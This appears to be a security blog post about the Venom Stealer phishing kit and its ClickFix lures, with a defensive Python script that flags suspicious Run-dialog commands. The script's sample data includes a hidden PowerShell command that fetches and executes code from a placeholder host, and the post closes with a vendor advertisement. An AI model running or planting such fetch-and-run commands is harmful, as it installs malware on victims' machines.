Latest Phishing Kit Runs ClickFix Attacks
Researchers, BlackFog:
Threat actors can automate ClickFix attacks with a new cheap phishing kit called "Venom Stealer."
“Venom goes beyond credential harvesting, which sets it apart from commodity thieves like Lumma, Vidar, and RedLine.”
It integrates ClickFix social engineering straight into the operator panel, automates all further steps following initial access, and establishes an ongoing exfiltration pipeline that continues after the original payload is completed. With a validated application process, Telegram-based licensing, and a 15% affiliate program, the developer, going by the handle "VenomStealer," offers access as a subscription ($250/month to $1,800 lifetime).
ClickFix is a social engineering technique that deceives people into running harmful commands on their computer, which typically leads to the installation of malware.
Because ClickFix attacks are user-initiated, they are more likely to avoid detection by security measures.
Researchers:
“When a target lands on an operator-hosted ClickFix website, the infection starts.”
“For both Windows and macOS, Venom provides four templates: a phony Cloudflare CAPTCHA, a phony OS update, a phony SSL certificate error, and a phony font install page. Each one requests that the victim launch a Terminal or Run dialog, paste a command, and hit Enter.
The process appears user-initiated and avoids detection logic based on parent-child process linkages because the target starts the execution itself.”
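As an added example (not from BlackFog or the original article), here is one way a defender can triage for this on Windows: a command entered through the Run dialog is recorded by Explorer in the user's RunMRU registry key, so the command text itself can be scored even when the process lineage looks user-initiated. The indicator patterns, function names and sample values are assumptions constructed for illustration, and the macOS Terminal path is not covered.

```python
import re

# Illustrative heuristics (assumptions, not a vendor rule set) for commands
# pasted into the Windows Run dialog during a ClickFix lure.
INDICATORS = {
    "script_host": re.compile(r"\b(powershell|pwsh|mshta|cmd|wscript|cscript|curl)(\.exe)?\b", re.I),
    "remote_fetch": re.compile(r"https?://|\b(iwr|irm|invoke-webrequest|invoke-restmethod)\b", re.I),
    "inline_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "hidden_window": re.compile(r"-w(in(dowstyle)?)?\s+h(idden)?\b", re.I),
    "lure_comment": re.compile(r"#.*(captcha|verif|robot|cloudflare)", re.I),
}

def score_command(cmd):
    """Return the sorted names of indicators that match one command string."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(cmd))

def triage_runmru(values, threshold=2):
    """values: RunMRU registry values (name -> data) exported from one user hive.
    Returns (name, command, hits) for entries with >= threshold indicators."""
    flagged = []
    for name, data in values.items():
        if name == "MRUList":  # ordering string, not a command
            continue
        cmd = data[:-2] if data.endswith("\\1") else data  # Explorer appends "\1"
        hits = score_command(cmd)
        if len(hits) >= threshold:
            flagged.append((name, cmd, hits))
    return flagged

# Constructed sample export of
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "cmd\\1",
    "b": "\\\\fileserver\\share\\reports\\1",
    "c": 'powershell -w hidden -c "iwr https://example.invalid/v | iex" # Cloudflare verification ID 4821\\1',
}

if __name__ == "__main__":
    for name, cmd, hits in triage_runmru(SAMPLE_RUNMRU):
        print(f"[RunMRU:{name}] {hits}\n    {cmd}")
```

The threshold of two keeps ordinary entries such as a bare `cmd` or a UNC path from being flagged; tune it against your own baseline of Run dialog usage.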
After the malware is installed, it quickly searches the computer for private data and transmits it to the attackers.
What happens?
- As soon as the payload launches, it scans all of the computer's Chromium and Firefox-based browsers, retrieving saved passwords, session cookies, browsing history, autofill information, and cryptocurrency wallet vaults from each profile.
- A silent privilege escalation is used to get around Chrome's v10 and v20 password encryption, extracting the decryption key without causing a UAC pop-up and leaving no forensic evidence.
- Along with the credentials, system fingerprinting and browser extension inventories are recorded, providing fraudsters with a comprehensive picture of every target.
Conclusion
Now that we have covered the latest phishing kit running ClickFix attacks, you might want to learn how you can secure yourself against such attacks. For that, you can get in contact with Craw Security, which offers a dedicated phishing simulation platform, "PhishNext," that gives you the experience of real-life phishing attacks and offers you a solution on how you can evade them in time. What are you waiting for? Contact now!


